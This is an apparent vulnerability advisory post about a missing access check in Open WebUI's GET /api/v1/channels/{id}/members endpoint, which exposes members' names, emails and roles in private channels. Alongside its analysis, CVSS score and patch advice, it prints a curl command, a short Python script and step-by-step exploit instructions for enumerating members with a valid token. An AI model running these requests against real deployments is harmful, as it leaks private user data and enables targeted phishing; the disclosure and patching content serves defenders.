Listen to this Post
The vulnerability exists in the `get_channel_members_by_id` function within `backend/open_webui/routers/channels.py` (lines 445-507). This endpoint (GET /api/v1/channels/{id}/members) is intended to return the list of members for a given channel. However, the access control logic only verifies membership for channel types `’group’` or `’dm’` (lines 467-469). For standard channels (including private ones), no `channel_has_access` check is performed. Any authenticated user who knows the UUID of a private standard channel—obtained via logs, browser history, or other API responses—can directly call this endpoint. The server will then return the full member list containing IDs, names, emails, roles, and profile images. In contrast, other endpoints like `get_channel_messages` (line 688) correctly call `channel_has_access(user.id, channel, permission=’read’)` for standard channels. The flaw is a classic missing authorization check, leading to unauthorized information disclosure. Attack complexity is low, requiring only a valid account and network access. The CVSS 3.1 vector is AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N, resulting in a base score of 4.3 (Medium). No user interaction or privilege escalation is needed. The channel feature must be enabled (disabled by default). The vulnerability affects the current main branch and likely all versions with the channels feature.
dailycve form:
Platform: Open WebUI
Version: main branch
Vulnerability: Missing access check
Severity: Medium
date: 2026-05-08
Prediction: 2026-05-22
Analytics under heading What Undercode Say:
Enumerate private channel members (assumes valid JWT token)
CHANNEL_UUID="550e8400-e29b-41d4-a716-446655440000"
curl -X GET "https://target.com/api/v1/channels/${CHANNEL_UUID}/members" \
-H "Authorization: Bearer ${JWT_TOKEN}" | jq '.'
Python script to exploit missing access check
import requests
url = "https://target.com/api/v1/channels/{uuid}/members"
headers = {"Authorization": f"Bearer {token}"}
response = requests.get(url.format(uuid=known_private_channel_uuid), headers=headers)
if response.status_code == 200:
for member in response.json():
print(f"ID: {member['id']}, Name: {member['name']}, Email: {member.get('email')}")
Exploit:
Authenticate to obtain a valid session token. Guess or obtain a private standard channel UUID (e.g., from previously leaked URLs, `Referer` headers, or browser devtools). Send a GET request to `/api/v1/channels/{uuid}/members` with the token. Parse JSON response to extract all member details.
Protection from this CVE:
Apply patch that adds `channel_has_access(user.id, channel, permission=’read’)` check for standard channels before returning members. Alternatively, disable the channels feature if not needed. Upgrade to a fixed version once released. Implement UUID entropy monitoring and rate-limiting on member enumeration endpoints.
Impact:
Leaks identities, emails, and roles of all users in a private channel. Reveals organizational structure and project assignments. Enables targeted social engineering, spear-phishing, and internal network mapping. Compromises privacy of channel members without exposing message content.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
